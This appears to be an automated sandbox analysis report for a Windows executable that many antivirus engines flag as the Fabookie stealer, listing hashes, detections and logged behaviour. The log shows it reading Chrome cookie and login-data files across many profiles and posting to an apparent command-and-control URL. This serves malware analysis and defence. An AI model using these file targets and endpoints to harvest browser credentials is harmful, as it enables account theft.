Summary | ZeroBOX

customer50.exe

Tags: UPX, ASPack, Malicious Library, PE64, PE File, OS Processor Check

Category: FILE
Machine: s1_win7_x6401
Started: Oct. 18, 2021, 9:27 a.m.
Completed: Oct. 18, 2021, 9:35 a.m.
Size 1.3MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 5fc5f085acfa0071db7d7ecaca696650
SHA256 9d35a2153846ecea71060d69014279cb526f8b432913d02759c5023a81c62d59
CRC32 8C069577
ssdeep 24576:nkg6rJg7+sAKWHUUuxRfAmBJOQEhP4v4qLq/nbFtU+a1Svk7t:nulgSsAtHUdTzOQoP0Lq/xh9vkZ
PDB Path D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb
Yara
  • ASPack_Zero - ASPack packed file
  • IsPE64 - (no description)
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

IP Address Status Action
164.124.101.2 Active Moloch
208.95.112.1 Active Moloch
45.136.151.102 Active Moloch

Suricata Alerts

Flow: TCP 192.168.56.101:49198 -> 208.95.112.1:80
SID: 2022082
Signature: ET POLICY External IP Lookup ip-api.com
Category: Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

pdb_path D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb
Time & API | Arguments | Status | Return | Repeated
GlobalMemoryStatusEx | (no arguments) | 1 | 1 | 0
section _RDATA
resource name TXT
suspicious_features POST method with no referer header
suspicious_request POST http://staticimg.youtuuee.com/api/?sid=669873&key=a53835fb03e9db9fd734c3e314bbcc07
request GET http://ip-api.com/json/
request GET http://staticimg.youtuuee.com/api/fbtime
request POST http://staticimg.youtuuee.com/api/?sid=669873&key=a53835fb03e9db9fd734c3e314bbcc07
request POST http://staticimg.youtuuee.com/api/?sid=669873&key=a53835fb03e9db9fd734c3e314bbcc07
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies
domain ip-api.com
Time & API | Arguments | Status | Return | Repeated
GetAdaptersAddresses | flags: 15, family: 0 | 111 0
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Cerbu.112705
CAT-QuickHeal Trojan.Fabookie
McAfee Artemis!5FC5F085ACFA
Cylance Unsafe
Sangfor Trojan.Win64.Fabookie.WY
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win64/Fabookie.19cd5845
K7GW Riskware ( 0040eff71 )
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of Win64/Agent.ATS
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.Spyagent-9830839-0
Kaspersky Trojan.Win32.Fabookie.zm
BitDefender Gen:Variant.Cerbu.112705
Avast Win64:Trojan-gen
Tencent Win32.Trojan.Fabookie.Tazd
Ad-Aware Gen:Variant.Cerbu.112705
Emsisoft Trojan.Agent (A)
Comodo fls.noname@0
McAfee-GW-Edition Artemis!Trojan
FireEye Gen:Variant.Cerbu.112705
Sophos Mal/Generic-S
Avira TR/Agent.wqvta
MAX malware (ai score=100)
Kingsoft Win32.Troj.Fabookie.zm.(kcloud)
Gridinsoft Trojan.Win64.Agent.oa
Microsoft Trojan:Win64/Fabookie.WY!MTB
GData Gen:Variant.Cerbu.112705
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.R445766
ALYac Gen:Variant.Cerbu.112705
TrendMicro-HouseCall TROJ_GEN.R002C0DJG21
Rising Stealer.FBAdsCard!1.D97B (CLASSIC)
Ikarus Trojan.Win64.Agent
Fortinet W64/Agent.ATS!tr
AVG Win64:Trojan-gen
Panda Trj/CI.A